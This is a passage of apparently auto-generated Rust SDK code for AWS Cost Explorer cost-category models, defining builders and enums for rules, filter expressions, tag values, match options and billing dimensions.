#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) value: std::option::Option<std::string::String>,
pub(crate) rule: std::option::Option<crate::model::Expression>,
pub(crate) inherited_value:
std::option::Option<crate::model::CostCategoryInheritedValueDimension>,
pub(crate) r#type: std::option::Option<crate::model::CostCategoryRuleType>,
}
impl Builder {
/// <p>The
/// default value for the cost category.</p>
pub fn value(mut self, input: impl Into<std::string::String>) -> Self {
self.value = Some(input.into());
self
}
pub fn set_value(mut self, input: std::option::Option<std::string::String>) -> Self {
self.value = input;
self
}
/// <p>An <a href="https://docs.aws.amazon.com/aws-cost-management/latest/APIReference/API_Expression.html">Expression</a>
/// object used to categorize costs. This supports dimensions, tags, and nested expressions.
/// Currently the only dimensions supported are <code>LINKED_ACCOUNT</code>,
/// <code>SERVICE_CODE</code>, <code>RECORD_TYPE</code>, and
/// <code>LINKED_ACCOUNT_NAME</code>.</p>
/// <p>Root level <code>OR</code> isn't supported. We recommend that you create a separate
/// rule instead.</p>
/// <p>
/// <code>RECORD_TYPE</code> is a dimension used for Cost Explorer APIs, and is also
/// supported for Cost Category expressions. This dimension uses different terms, depending
/// on whether you're using the console or API/JSON editor. For a detailed comparison, see
/// <a href="https://docs.aws.amazon.com/awsaccountbilling/latest/aboutv2/manage-cost-categories.html#cost-categories-terms">Term Comparisons</a> in the <i>Billing and Cost Management User
/// Guide</i>.</p>
pub fn rule(mut self, input: crate::model::Expression) -> Self {
self.rule = Some(input);
self
}
pub fn set_rule(mut self, input: std::option::Option<crate::model::Expression>) -> Self {
self.rule = input;
self
}
/// <p>The value the line item is categorized as if the line item contains the matched
/// dimension.</p>
pub fn inherited_value(
mut self,
input: crate::model::CostCategoryInheritedValueDimension,
) -> Self {
self.inherited_value = Some(input);
self
}
pub fn set_inherited_value(
mut self,
input: std::option::Option<crate::model::CostCategoryInheritedValueDimension>,
) -> Self {
self.inherited_value = input;
self
}
/// <p>You can define the <code>CostCategoryRule</code> rule type as either
/// <code>REGULAR</code> or <code>INHERITED_VALUE</code>. The
/// <code>INHERITED_VALUE</code> rule type adds the flexibility of defining a rule that
/// dynamically inherits the cost category value from the dimension value defined by
/// <code>CostCategoryInheritedValueDimension</code>. For example, if you want to
/// dynamically group costs based on the value of a specific tag key, first choose an
/// inherited value rule type, then choose the tag dimension and specify the tag key to
/// use.</p>
pub fn r#type(mut self, input: crate::model::CostCategoryRuleType) -> Self {
self.r#type = Some(input);
self
}
pub fn set_type(
mut self,
input: std::option::Option<crate::model::CostCategoryRuleType>,
) -> Self {
self.r#type = input;
self
}
/// Consumes the builder and constructs a [`CostCategoryRule`](crate::model::CostCategoryRule)
pub fn build(self) -> crate::model::CostCategoryRule {
crate::model::CostCategoryRule {
value: self.value,
rule: self.rule,
inherited_value: self.inherited_value,
r#type: self.r#type,
}
}
}
}
impl CostCategoryRule {
/// Creates a new builder-style object to manufacture [`CostCategoryRule`](crate::model::CostCategoryRule)
pub fn builder() -> crate::model::cost_category_rule::Builder {
crate::model::cost_category_rule::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategoryRuleType {
InheritedValue,
Regular,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategoryRuleType {
fn from(s: &str) -> Self {
match s {
"INHERITED_VALUE" => CostCategoryRuleType::InheritedValue,
"REGULAR" => CostCategoryRuleType::Regular,
other => CostCategoryRuleType::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategoryRuleType {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategoryRuleType::from(s))
}
}
impl CostCategoryRuleType {
pub fn as_str(&self) -> &str {
match self {
CostCategoryRuleType::InheritedValue => "INHERITED_VALUE",
CostCategoryRuleType::Regular => "REGULAR",
CostCategoryRuleType::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["INHERITED_VALUE", "REGULAR"]
}
}
impl AsRef<str> for CostCategoryRuleType {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>When creating or updating a cost category, you can define the
/// <code>CostCategoryRule</code> rule type as <code>INHERITED_VALUE</code>. This rule
/// type adds the flexibility of defining a rule that dynamically inherits the cost category
/// value from the dimension value defined by
/// <code>CostCategoryInheritedValueDimension</code>. For example, if you want to
/// dynamically group costs that are based on the value of a specific tag key, first choose
/// an inherited value rule type, then choose the tag dimension and specify the tag key to
/// use.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryInheritedValueDimension {
/// <p>The name of the dimension that's used to group costs.</p>
/// <p>If you specify <code>LINKED_ACCOUNT_NAME</code>, the cost category value is based on
/// account name. If you specify <code>TAG</code>, the cost category value will be based on
/// the value of the specified tag key.</p>
pub dimension_name: std::option::Option<crate::model::CostCategoryInheritedValueDimensionName>,
/// <p>The key to extract cost category values.</p>
pub dimension_key: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CostCategoryInheritedValueDimension {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategoryInheritedValueDimension");
formatter.field("dimension_name", &self.dimension_name);
formatter.field("dimension_key", &self.dimension_key);
formatter.finish()
}
}
/// See [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
pub mod cost_category_inherited_value_dimension {
/// A builder for [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dimension_name:
std::option::Option<crate::model::CostCategoryInheritedValueDimensionName>,
pub(crate) dimension_key: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the dimension that's used to group costs.</p>
/// <p>If you specify <code>LINKED_ACCOUNT_NAME</code>, the cost category value is based on
/// account name. If you specify <code>TAG</code>, the cost category value will be based on
/// the value of the specified tag key.</p>
pub fn dimension_name(
mut self,
input: crate::model::CostCategoryInheritedValueDimensionName,
) -> Self {
self.dimension_name = Some(input);
self
}
pub fn set_dimension_name(
mut self,
input: std::option::Option<crate::model::CostCategoryInheritedValueDimensionName>,
) -> Self {
self.dimension_name = input;
self
}
/// <p>The key to extract cost category values.</p>
pub fn dimension_key(mut self, input: impl Into<std::string::String>) -> Self {
self.dimension_key = Some(input.into());
self
}
pub fn set_dimension_key(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dimension_key = input;
self
}
/// Consumes the builder and constructs a [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
pub fn build(self) -> crate::model::CostCategoryInheritedValueDimension {
crate::model::CostCategoryInheritedValueDimension {
dimension_name: self.dimension_name,
dimension_key: self.dimension_key,
}
}
}
}
impl CostCategoryInheritedValueDimension {
/// Creates a new builder-style object to manufacture [`CostCategoryInheritedValueDimension`](crate::model::CostCategoryInheritedValueDimension)
pub fn builder() -> crate::model::cost_category_inherited_value_dimension::Builder {
crate::model::cost_category_inherited_value_dimension::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum CostCategoryInheritedValueDimensionName {
LinkedAccountName,
Tag,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for CostCategoryInheritedValueDimensionName {
fn from(s: &str) -> Self {
match s {
"LINKED_ACCOUNT_NAME" => CostCategoryInheritedValueDimensionName::LinkedAccountName,
"TAG" => CostCategoryInheritedValueDimensionName::Tag,
other => CostCategoryInheritedValueDimensionName::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for CostCategoryInheritedValueDimensionName {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(CostCategoryInheritedValueDimensionName::from(s))
}
}
impl CostCategoryInheritedValueDimensionName {
pub fn as_str(&self) -> &str {
match self {
CostCategoryInheritedValueDimensionName::LinkedAccountName => "LINKED_ACCOUNT_NAME",
CostCategoryInheritedValueDimensionName::Tag => "TAG",
CostCategoryInheritedValueDimensionName::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&["LINKED_ACCOUNT_NAME", "TAG"]
}
}
impl AsRef<str> for CostCategoryInheritedValueDimensionName {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>Use <code>Expression</code> to filter by cost or by usage. There are two patterns: </p>
/// <ul>
/// <li>
/// <p>Simple dimension values - You can set the dimension name and values for the
/// filters that you plan to use. For example, you can filter for
/// <code>REGION==us-east-1 OR REGION==us-west-1</code>. For
/// <code>GetRightsizingRecommendation</code>, the Region is a full name (for
/// example, <code>REGION==US East (N. Virginia)</code>. The <code>Expression</code>
/// example is as follows:</p>
/// <p>
/// <code>{ "Dimensions": { "Key": "REGION", "Values": [ "us-east-1", “us-west-1” ]
/// } }</code>
/// </p>
/// <p>The list of dimension values are OR'd together to retrieve cost or usage data.
/// You can create <code>Expression</code> and <code>DimensionValues</code> objects
/// using either <code>with*</code> methods or <code>set*</code> methods in multiple
/// lines. </p>
/// </li>
/// <li>
/// <p>Compound dimension values with logical operations - You can use multiple
/// <code>Expression</code> types and the logical operators
/// <code>AND/OR/NOT</code> to create a list of one or more
/// <code>Expression</code> objects. By doing this, you can filter on more
/// advanced options. For example, you can filter on <code>((REGION == us-east-1 OR
/// REGION == us-west-1) OR (TAG.Type == Type1)) AND (USAGE_TYPE !=
/// DataTransfer)</code>. The <code>Expression</code> for that is as
/// follows:</p>
/// <p>
/// <code>{ "And": [ {"Or": [ {"Dimensions": { "Key": "REGION", "Values": [
/// "us-east-1", "us-west-1" ] }}, {"Tags": { "Key": "TagName", "Values":
/// ["Value1"] } } ]}, {"Not": {"Dimensions": { "Key": "USAGE_TYPE", "Values":
/// ["DataTransfer"] }}} ] } </code>
/// </p>
/// <note>
/// <p>Because each <code>Expression</code> can have only one operator, the
/// service returns an error if more than one is specified. The following
/// example shows an <code>Expression</code> object that creates an
/// error.</p>
/// </note>
/// <p>
/// <code> { "And": [ ... ], "DimensionValues": { "Dimension": "USAGE_TYPE",
/// "Values": [ "DataTransfer" ] } } </code>
/// </p>
/// </li>
/// </ul>
/// <note>
/// <p>For the <code>GetRightsizingRecommendation</code> action, a combination of OR and
/// NOT isn't supported. OR isn't supported between different dimensions, or dimensions
/// and tags. NOT operators aren't supported. Dimensions are also limited to
/// <code>LINKED_ACCOUNT</code>, <code>REGION</code>, or
/// <code>RIGHTSIZING_TYPE</code>.</p>
/// <p>For the <code>GetReservationPurchaseRecommendation</code> action, only NOT is
/// supported. AND and OR aren't supported. Dimensions are limited to
/// <code>LINKED_ACCOUNT</code>.</p>
/// </note>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Expression {
/// <p>Return results that match either <code>Dimension</code> object.</p>
pub or: std::option::Option<std::vec::Vec<crate::model::Expression>>,
/// <p>Return results that match both <code>Dimension</code> objects.</p>
pub and: std::option::Option<std::vec::Vec<crate::model::Expression>>,
/// <p>Return results that don't match a <code>Dimension</code> object.</p>
pub not: std::option::Option<std::boxed::Box<crate::model::Expression>>,
/// <p>The specific <code>Dimension</code> to use for <code>Expression</code>.</p>
pub dimensions: std::option::Option<crate::model::DimensionValues>,
/// <p>The specific <code>Tag</code> to use for <code>Expression</code>.</p>
pub tags: std::option::Option<crate::model::TagValues>,
/// <p>The filter that's based on <code>CostCategory</code> values.</p>
pub cost_categories: std::option::Option<crate::model::CostCategoryValues>,
}
impl std::fmt::Debug for Expression {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("Expression");
formatter.field("or", &self.or);
formatter.field("and", &self.and);
formatter.field("not", &self.not);
formatter.field("dimensions", &self.dimensions);
formatter.field("tags", &self.tags);
formatter.field("cost_categories", &self.cost_categories);
formatter.finish()
}
}
/// See [`Expression`](crate::model::Expression)
pub mod expression {
/// A builder for [`Expression`](crate::model::Expression)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) or: std::option::Option<std::vec::Vec<crate::model::Expression>>,
pub(crate) and: std::option::Option<std::vec::Vec<crate::model::Expression>>,
pub(crate) not: std::option::Option<std::boxed::Box<crate::model::Expression>>,
pub(crate) dimensions: std::option::Option<crate::model::DimensionValues>,
pub(crate) tags: std::option::Option<crate::model::TagValues>,
pub(crate) cost_categories: std::option::Option<crate::model::CostCategoryValues>,
}
impl Builder {
pub fn or(mut self, input: impl Into<crate::model::Expression>) -> Self {
let mut v = self.or.unwrap_or_default();
v.push(input.into());
self.or = Some(v);
self
}
pub fn set_or(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Expression>>,
) -> Self {
self.or = input;
self
}
pub fn and(mut self, input: impl Into<crate::model::Expression>) -> Self {
let mut v = self.and.unwrap_or_default();
v.push(input.into());
self.and = Some(v);
self
}
pub fn set_and(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Expression>>,
) -> Self {
self.and = input;
self
}
/// <p>Return results that don't match a <code>Dimension</code> object.</p>
pub fn not(mut self, input: impl Into<std::boxed::Box<crate::model::Expression>>) -> Self {
self.not = Some(input.into());
self
}
pub fn set_not(
mut self,
input: std::option::Option<std::boxed::Box<crate::model::Expression>>,
) -> Self {
self.not = input;
self
}
/// <p>The specific <code>Dimension</code> to use for <code>Expression</code>.</p>
pub fn dimensions(mut self, input: crate::model::DimensionValues) -> Self {
self.dimensions = Some(input);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<crate::model::DimensionValues>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The specific <code>Tag</code> to use for <code>Expression</code>.</p>
pub fn tags(mut self, input: crate::model::TagValues) -> Self {
self.tags = Some(input);
self
}
pub fn set_tags(mut self, input: std::option::Option<crate::model::TagValues>) -> Self {
self.tags = input;
self
}
/// <p>The filter that's based on <code>CostCategory</code> values.</p>
pub fn cost_categories(mut self, input: crate::model::CostCategoryValues) -> Self {
self.cost_categories = Some(input);
self
}
pub fn set_cost_categories(
mut self,
input: std::option::Option<crate::model::CostCategoryValues>,
) -> Self {
self.cost_categories = input;
self
}
/// Consumes the builder and constructs a [`Expression`](crate::model::Expression)
pub fn build(self) -> crate::model::Expression {
crate::model::Expression {
or: self.or,
and: self.and,
not: self.not,
dimensions: self.dimensions,
tags: self.tags,
cost_categories: self.cost_categories,
}
}
}
}
impl Expression {
/// Creates a new builder-style object to manufacture [`Expression`](crate::model::Expression)
pub fn builder() -> crate::model::expression::Builder {
crate::model::expression::Builder::default()
}
}
/// <p>The Cost Categories values used for filtering the costs.</p>
/// <p>If <code>Values</code> and <code>Key</code> are not specified, the <code>ABSENT</code>
/// <code>MatchOption</code> is applied to all Cost Categories. That is, it filters on
/// resources that aren't mapped to any Cost Categories.</p>
/// <p>If <code>Values</code> is provided and <code>Key</code> isn't specified, the
/// <code>ABSENT</code>
/// <code>MatchOption</code> is applied to the Cost Categories <code>Key</code> only. That
/// is, it filters on resources without the given Cost Categories key.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategoryValues {
/// <p>The unique name of the Cost Category.</p>
pub key: std::option::Option<std::string::String>,
/// <p>The specific value of the Cost Category.</p>
pub values: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The match options that you can use to filter your results. MatchOptions is only
/// applicable for actions related to cost category. The default values for
/// <code>MatchOptions</code> is <code>EQUALS</code> and <code>CASE_SENSITIVE</code>.
/// </p>
pub match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl std::fmt::Debug for CostCategoryValues {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("CostCategoryValues");
formatter.field("key", &self.key);
formatter.field("values", &self.values);
formatter.field("match_options", &self.match_options);
formatter.finish()
}
}
/// See [`CostCategoryValues`](crate::model::CostCategoryValues)
pub mod cost_category_values {
/// A builder for [`CostCategoryValues`](crate::model::CostCategoryValues)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) key: std::option::Option<std::string::String>,
pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl Builder {
/// <p>The unique name of the Cost Category.</p>
pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
self.key = Some(input.into());
self
}
pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
self.key = input;
self
}
pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.values.unwrap_or_default();
v.push(input.into());
self.values = Some(v);
self
}
pub fn set_values(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.values = input;
self
}
pub fn match_options(mut self, input: impl Into<crate::model::MatchOption>) -> Self {
let mut v = self.match_options.unwrap_or_default();
v.push(input.into());
self.match_options = Some(v);
self
}
pub fn set_match_options(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
) -> Self {
self.match_options = input;
self
}
/// Consumes the builder and constructs a [`CostCategoryValues`](crate::model::CostCategoryValues)
pub fn build(self) -> crate::model::CostCategoryValues {
crate::model::CostCategoryValues {
key: self.key,
values: self.values,
match_options: self.match_options,
}
}
}
}
impl CostCategoryValues {
/// Creates a new builder-style object to manufacture [`CostCategoryValues`](crate::model::CostCategoryValues)
pub fn builder() -> crate::model::cost_category_values::Builder {
crate::model::cost_category_values::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum MatchOption {
Absent,
CaseInsensitive,
CaseSensitive,
Contains,
EndsWith,
Equals,
StartsWith,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for MatchOption {
fn from(s: &str) -> Self {
match s {
"ABSENT" => MatchOption::Absent,
"CASE_INSENSITIVE" => MatchOption::CaseInsensitive,
"CASE_SENSITIVE" => MatchOption::CaseSensitive,
"CONTAINS" => MatchOption::Contains,
"ENDS_WITH" => MatchOption::EndsWith,
"EQUALS" => MatchOption::Equals,
"STARTS_WITH" => MatchOption::StartsWith,
other => MatchOption::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for MatchOption {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(MatchOption::from(s))
}
}
impl MatchOption {
pub fn as_str(&self) -> &str {
match self {
MatchOption::Absent => "ABSENT",
MatchOption::CaseInsensitive => "CASE_INSENSITIVE",
MatchOption::CaseSensitive => "CASE_SENSITIVE",
MatchOption::Contains => "CONTAINS",
MatchOption::EndsWith => "ENDS_WITH",
MatchOption::Equals => "EQUALS",
MatchOption::StartsWith => "STARTS_WITH",
MatchOption::Unknown(s) => s.as_ref(),
}
}
pub fn values() -> &'static [&'static str] {
&[
"ABSENT",
"CASE_INSENSITIVE",
"CASE_SENSITIVE",
"CONTAINS",
"ENDS_WITH",
"EQUALS",
"STARTS_WITH",
]
}
}
impl AsRef<str> for MatchOption {
fn as_ref(&self) -> &str {
self.as_str()
}
}
/// <p>The values that are available for a tag.</p>
/// <p>If <code>Values</code> and <code>Key</code> aren't specified, the <code>ABSENT</code>
/// <code>MatchOption</code> is applied to all tags. That is, it's filtered on resources
/// with no tags.</p>
/// <p>If <code>Values</code> is provided and <code>Key</code> isn't specified, the
/// <code>ABSENT</code>
/// <code>MatchOption</code> is applied to the tag <code>Key</code> only. That is, it's
/// filtered on resources without the given tag key.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TagValues {
/// <p>The key for the tag.</p>
pub key: std::option::Option<std::string::String>,
/// <p>The specific value of the tag.</p>
pub values: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The match options that you can use to filter your results. <code>MatchOptions</code>
/// is only applicable for actions related to Cost Category. The default values for
/// <code>MatchOptions</code> are <code>EQUALS</code> and
/// <code>CASE_SENSITIVE</code>.</p>
pub match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl std::fmt::Debug for TagValues {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("TagValues");
formatter.field("key", &self.key);
formatter.field("values", &self.values);
formatter.field("match_options", &self.match_options);
formatter.finish()
}
}
/// See [`TagValues`](crate::model::TagValues)
pub mod tag_values {
/// A builder for [`TagValues`](crate::model::TagValues)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) key: std::option::Option<std::string::String>,
pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl Builder {
/// <p>The key for the tag.</p>
pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
self.key = Some(input.into());
self
}
pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
self.key = input;
self
}
pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.values.unwrap_or_default();
v.push(input.into());
self.values = Some(v);
self
}
pub fn set_values(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.values = input;
self
}
pub fn match_options(mut self, input: impl Into<crate::model::MatchOption>) -> Self {
let mut v = self.match_options.unwrap_or_default();
v.push(input.into());
self.match_options = Some(v);
self
}
pub fn set_match_options(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
) -> Self {
self.match_options = input;
self
}
/// Consumes the builder and constructs a [`TagValues`](crate::model::TagValues)
pub fn build(self) -> crate::model::TagValues {
crate::model::TagValues {
key: self.key,
values: self.values,
match_options: self.match_options,
}
}
}
}
impl TagValues {
/// Creates a new builder-style object to manufacture [`TagValues`](crate::model::TagValues)
pub fn builder() -> crate::model::tag_values::Builder {
crate::model::tag_values::Builder::default()
}
}
/// <p>The metadata that you can use to filter and group your results. You can use
/// <code>GetDimensionValues</code> to find specific values.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct DimensionValues {
/// <p>The names of the metadata types that you can use to filter and group your results. For
/// example, <code>AZ</code> returns a list of Availability Zones.</p>
pub key: std::option::Option<crate::model::Dimension>,
/// <p>The metadata values that you can use to filter and group your results. You can use
/// <code>GetDimensionValues</code> to find specific values.</p>
pub values: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The match options that you can use to filter your results. <code>MatchOptions</code>
/// is only applicable for actions related to Cost Category. The default values for
/// <code>MatchOptions</code> are <code>EQUALS</code> and
/// <code>CASE_SENSITIVE</code>.</p>
pub match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl std::fmt::Debug for DimensionValues {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("DimensionValues");
formatter.field("key", &self.key);
formatter.field("values", &self.values);
formatter.field("match_options", &self.match_options);
formatter.finish()
}
}
/// See [`DimensionValues`](crate::model::DimensionValues)
pub mod dimension_values {
/// A builder for [`DimensionValues`](crate::model::DimensionValues)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) key: std::option::Option<crate::model::Dimension>,
pub(crate) values: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) match_options: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
}
impl Builder {
/// <p>The names of the metadata types that you can use to filter and group your results. For
/// example, <code>AZ</code> returns a list of Availability Zones.</p>
pub fn key(mut self, input: crate::model::Dimension) -> Self {
self.key = Some(input);
self
}
pub fn set_key(mut self, input: std::option::Option<crate::model::Dimension>) -> Self {
self.key = input;
self
}
pub fn values(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.values.unwrap_or_default();
v.push(input.into());
self.values = Some(v);
self
}
pub fn set_values(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.values = input;
self
}
pub fn match_options(mut self, input: impl Into<crate::model::MatchOption>) -> Self {
let mut v = self.match_options.unwrap_or_default();
v.push(input.into());
self.match_options = Some(v);
self
}
pub fn set_match_options(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::MatchOption>>,
) -> Self {
self.match_options = input;
self
}
/// Consumes the builder and constructs a [`DimensionValues`](crate::model::DimensionValues)
pub fn build(self) -> crate::model::DimensionValues {
crate::model::DimensionValues {
key: self.key,
values: self.values,
match_options: self.match_options,
}
}
}
}
impl DimensionValues {
/// Creates a new builder-style object to manufacture [`DimensionValues`](crate::model::DimensionValues)
pub fn builder() -> crate::model::dimension_values::Builder {
crate::model::dimension_values::Builder::default()
}
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum Dimension {
AgreementEndDateTimeAfter,
AgreementEndDateTimeBefore,
Az,
BillingEntity,
CacheEngine,
DatabaseEngine,
DeploymentOption,
InstanceType,
InstanceTypeFamily,
LegalEntityName,
LinkedAccount,
LinkedAccountName,
OperatingSystem,
Operation,
PaymentOption,
Platform,
PurchaseType,
RecordType,
Region,
ReservationId,
ResourceId,
RightsizingType,
SavingsPlansType,
SavingsPlanArn,
Scope,
Service,
ServiceCode,
SubscriptionId,
Tenancy,
UsageType,
UsageTypeGroup,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for Dimension {
fn from(s: &str) -> Self {
match s {
"AGREEMENT_END_DATE_TIME_AFTER" => Dimension::AgreementEndDateTimeAfter,
"AGREEMENT_END_DATE_TIME_BEFORE" => Dimension::AgreementEndDateTimeBefore,
"AZ" => Dimension::Az,
"BILLING_ENTITY" => Dimension::BillingEntity,
"CACHE_ENGINE" => Dimension::CacheEngine,
"DATABASE_ENGINE" => Dimension::DatabaseEngine,
"DEPLOYMENT_OPTION" => Dimension::DeploymentOption,
"INSTANCE_TYPE" => Dimension::InstanceType,
"INSTANCE_TYPE_FAMILY" => Dimension::InstanceTypeFamily,
"LEGAL_ENTITY_NAME" => Dimension::LegalEntityName,
"LINKED_ACCOUNT" => Dimension::LinkedAccount,
"LINKED_ACCOUNT_NAME" => Dimension::LinkedAccountName,
"OPERATING_SYSTEM" => Dimension::OperatingSystem,
"OPERATION" => Dimension::Operation,
"PAYMENT_OPTION" => Dimension::PaymentOption,
"PLATFORM" => Dimension::Platform,
"PURCHASE_TYPE" => Dimension::PurchaseType,
"RECORD_TYPE" => Dimension::RecordType,
"REGION" => Dimension::Region,
"RESERVATION_ID" => Dimension::ReservationId,
"RESOURCE_ID" => Dimension::ResourceId,
"RIGHTSIZING_TYPE" => Dimension::RightsizingType,
"SAVINGS_PLANS_TYPE" => Dimension::SavingsPlansType,
"SAVINGS_PLAN_ARN" => Dimension::SavingsPlanArn,
"SCOPE" => Dimension::Scope,
"SERVICE" => Dimension::Service,
"SERVICE_CODE" => Dimension::ServiceCode,
"SUBSCRIPTION_ID" => Dimension::SubscriptionId,
"TENANCY" => Dimension::Tenancy,
"USAGE_TYPE" => Dimension::UsageType,
"USAGE_TYPE_GROUP" => Dimension::UsageTypeGroup,
other => Dimension::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for Dimension {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(Dimension::from(s))
}
}
impl Dimension {
pub fn as_str(&self) -> &str {
match self {
Dimension::AgreementEndDateTimeAfter => "AGREEMENT_END_DATE_TIME_AFTER",
Dimension::AgreementEndDateTimeBefore => "AGREEMENT_END_DATE_TIME_BEFORE",
Dimension::Az => "AZ",
Dimension::BillingEntity => "BILLING_ENTITY",
Dimension::CacheEngine => "CACHE_ENGINE",
Dimension::DatabaseEngine => "DATABASE_ENGINE",
Dimension::DeploymentOption => "DEPLOYMENT_OPTION",
Dimension::InstanceType => "INSTANCE_TYPE",
Dimension::InstanceTypeFamily => "INSTANCE_TYPE_FAMILY",
Dimension::LegalEntityName => "LEGAL_ENTITY_NAME",
Dimension::LinkedAccount => "LINKED_ACCOUNT",
Dimension::LinkedAccountName => "LINKED_ACCOUNT_NAME",
Dimension::OperatingSystem => "OPERATING_SYSTEM",
Dimension::Operation => "OPERATION",
Dimension::PaymentOption => "PAYMENT_OPTION",
Dimension::Platform => "PLATFORM",
Dimension::PurchaseType => "PURCHASE_TYPE",
Dimension::RecordType => "RECORD_TYPE",
Dimension::Region => "REGION",
Dimension::ReservationId => "RESERVATION_ID",
Dimension::ResourceId => "RESOURCE_ID",
Dimension::RightsizingType => "RIGHTSIZING_TYPE",
Dimension::SavingsPlansType => "SAVINGS_PLANS_TYPE",
Dimension::SavingsPlanArn => "SAVINGS_PLAN_ARN",
Dimension::Scope => "SCOPE",
Dimension::Service => "SERVICE",
Dimension::ServiceCode => "SERVICE_CODE",
Dimension::SubscriptionId => "SUBSCRIPTION_ID",
